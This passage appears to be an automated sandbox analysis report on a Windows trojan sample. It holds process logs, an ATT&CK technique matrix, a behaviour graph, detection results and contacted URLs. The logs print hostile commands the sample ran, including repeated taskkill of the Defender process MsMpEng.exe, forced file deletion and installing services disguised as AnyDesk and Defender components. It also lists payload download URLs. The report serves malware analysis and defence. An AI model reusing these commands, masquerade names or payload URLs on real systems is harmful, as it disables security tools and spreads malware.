Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C788D660 cpuid 0_2_00007FF6C788D660
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF6C788792C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,0_2_00007FF6C78877F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF6C7887748
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF6C7886ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,0_2_00007FF6C787B6D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,0_2_00007FF6C78875F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF6C78873A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: EnumSystemLocalesW,0_2_00007FF6C7887308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: EnumSystemLocalesW,0_2_00007FF6C7887238
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: EnumSystemLocalesW,0_2_00007FF6C787B258
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: GetLocaleInfoW,0_2_00007FF6C78902B0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,5_2_00007FF76E1ADF40
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,5_2_00007FF76E1AD820
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF76E1AE098
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: EnumSystemLocalesW,5_2_00007FF76E1ADB88
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: EnumSystemLocalesW,5_2_00007FF76E1ADC58
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: EnumSystemLocalesW,5_2_00007FF76E1A24C8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF76E1ADCF0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,5_2_00007FF76E1A2948
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,5_2_00007FF76E1AE148
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF76E1AE27C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeCode function: GetLocaleInfoW,5_2_00007FF76E1B72B0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,25_2_00007FF71DDAB6D8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,25_2_00007FF71DDB6ED0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,25_2_00007FF71DDB75F0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,25_2_00007FF71DDB77F8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_00007FF71DDB7748
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: EnumSystemLocalesW,25_2_00007FF71DDB7308
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,25_2_00007FF71DDC02B0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: EnumSystemLocalesW,25_2_00007FF71DDAB258
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: EnumSystemLocalesW,25_2_00007FF71DDB7238
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,25_2_00007FF71DDB792C
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_00007FF71DDB73A0
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeCode function: 0_2_00007FF6C7868324 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6C7868324

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		5
Windows Service		5
Windows Service		221
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Service Execution		1
DLL Side-Loading		11
Process Injection		21
Disable or Modify Tools		LSASS Memory121
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials33
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1521703 Sample: SecuriteInfo.com.Trojan.Win... Startdate: 29/09/2024 Architecture: WINDOWS Score: 76 116 duy-thanh.github.io 2->116 118 Multi AV Scanner detection for dropped file 2->118 120 Multi AV Scanner detection for submitted file 2->120 122 AI detected suspicious sample 2->122 11 AnyDeskUpdateService.exe 2->11         started        14 MicrosoftWindowsDefenderCoreService.exe 56 2->14         started        17 SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe 21 2->17         started        20 svchost.exe 2->20         started        signatures3 process4 dnsIp5 130 Uses taskkill to terminate AV processes 11->130 132 Drops executables to the windows directory (C:\Windows) and starts them 11->132 134 Excessive usage of taskkill to terminate processes 11->134 22 cmd.exe 11->22         started        25 cmd.exe 11->25         started        27 cmd.exe 11->27         started        35 23 other processes 11->35 98 C:\Windows\...\AnyDeskUpdateService.exe, PE32+ 14->98 dropped 100 C:\Windows\...\AnyDeskUpdateService[1].exe, PE32+ 14->100 dropped 102 C:\Windows\...\AnyDeskShellIntegration[1].dll, PE32+ 14->102 dropped 104 C:\...\AnyDeskShellIntegration_Update.dll, PE32+ 14->104 dropped 136 Creates files in the system32 config directory 14->136 29 cmd.exe 1 14->29         started        31 cmd.exe 14->31         started        37 17 other processes 14->37 114 duy-thanh.github.io 185.199.110.153, 443, 49710, 49711 FASTLYUS Netherlands 17->114 106 MicrosoftWindowsDefenderCoreService.exe, PE32+ 17->106 dropped 108 C:\Windows\...\AnyDeskCrashHandler.exe, PE32+ 17->108 dropped 110 C:\Windows\...\AnyDeskShellIntegration.dll, PE32+ 17->110 dropped 112 3 other malicious files 17->112 dropped 33 MicrosoftWindowsDefenderCoreService.exe 2 17->33         started        39 3 other processes 17->39 file6 signatures7 process8 signatures9 124 Excessive usage of taskkill to terminate processes 22->124 41 2 other processes 22->41 43 3 other processes 25->43 45 2 other processes 27->45 47 2 other processes 29->47 126 Drops executables to the windows directory (C:\Windows) and starts them 31->126 50 2 other processes 31->50 128 Multi AV Scanner detection for dropped file 33->128 52 2 other processes 33->52 54 50 other processes 35->54 56 28 other processes 37->56 58 2 other processes 39->58 process10 signatures11 64 3 other processes 41->64 60 Conhost.exe 43->60         started        66 2 other processes 45->66 68 2 other processes 47->68 62 cmd.exe 50->62         started        138 Multi AV Scanner detection for dropped file 52->138 70 3 other processes 52->70 72 12 other processes 54->72 74 8 other processes 56->74 76 4 other processes 58->76 process12 process13 78 sc.exe 1 70->78         started        80 sc.exe 1 70->80         started        82 conhost.exe 70->82         started        84 conhost.exe 70->84         started        86 cmd.exe 72->86         started        88 Conhost.exe 72->88         started        90 Conhost.exe 72->90         started        92 Conhost.exe 74->92         started        process14 94 Conhost.exe 78->94         started        96 Conhost.exe 80->96         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe32%ReversingLabsWin64.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exe42%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exe29%ReversingLabsWin64.Trojan.Generic
C:\Windows\System32\AnyDeskShellIntegration.dll0%ReversingLabs
C:\Windows\System32\AnyDeskShellIntegration_Update.dll0%ReversingLabs
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskShellIntegration[1].dll0%ReversingLabs
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\AnyDeskUpdateService[1].exe32%ReversingLabsWin32.Trojan.Generic
C:\Windows\System32\oobe\AnyDeskCrashHandler.exe29%ReversingLabsWin64.Trojan.Generic
C:\Windows\System32\oobe\AnyDeskUpdateService.exe32%ReversingLabsWin32.Trojan.Generic
C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe42%ReversingLabsWin64.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
duy-thanh.github.io
185.199.110.153
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://duy-thanh.github.io/file/AnyDeskCrashHandler.exefalse
      		unknown
      https://duy-thanh.github.io/file/AnyDeskUpdateService.exefalse
        		unknown
        https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllfalse
          		unknown
          https://duy-thanh.github.io/file/version.txtfalse
            		unknown
            https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exefalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duy-thanh.github.io/file/AnyDeskCrashHandler.exehttps://duy-thanh.github.io/file/AnyDeskUpdaMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpfalse
                		unknown
                https://duy-thanh.github.io/file/version.txtDMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B178A000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B1789000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B1789000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllgesSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exepSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://duy-thanh.github.io/=RSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://duy-thanh.github.io/1SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
